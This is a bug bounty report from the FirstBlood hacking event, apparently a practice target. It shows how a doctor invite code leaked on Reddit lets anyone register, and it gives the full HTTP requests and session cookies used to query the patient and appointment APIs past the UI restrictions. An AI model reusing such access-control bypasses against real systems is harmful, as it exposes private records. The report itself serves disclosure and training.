FirstBlood-#71Invite Code Leaked on Reddit leading to broken Authorisation



On 2021-05-09, jpdev reported:

Summary

A Reddit post containing the below invite code leaks once redeemed grants access to the Firstblood Management Portal once successfully registered it is posible to use the generated session to query the drapi directly outside of the UI, bypassing the authorisation restrictions for new logins.

Invite code:F16CA47250E445888824A9E63AE445CE

https://www.reddit.com/r/BugBountyHunter/comments/n4xzw1/firstbloodhackerscom_doctor_registration/ https://www.reddit.com/user/JollyHack/ Found with a google search of "firstbloodhacker.com"

This grants limit access to the panel and displays. Warning: As your account has been recently registered you will not be able to view patient information yet.

It is however possible to query the qp.php and query.php end points with the session using a proxy tool

Request

POST /drpanel/drapi/qp.php HTTP/1.1 Host: firstbloodhackers.com:49227 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 5 Origin: http://firstbloodhackers.com:49227 DNT: 1 Connection: close Referer: http://firstbloodhackers.com:49227/drpanel/cancelled.php Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b5fe7bd3a6ac6acc3b346e554

name=

It is also posible to query the appointments api with the same session

Request

GET /drpanel/drapi/query.php?aptid=56910219 HTTP/1.1 Host: firstbloodhackers.com:49227 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://firstbloodhackers.com:49227/drpanel/index.php Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=b5fe7bd3a6ac6acc3b346e554

Impact

Full api access to the appointment query and patient API bypassing of UI restrictions.

P2 High

Parameter:

Payload:


FirstBlood ID: 15
Vulnerability Type: Auth issues

A doctors invite code is leaked on the internet which if used grants anyone access to the doctor portal. The invite code should expire after use.


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.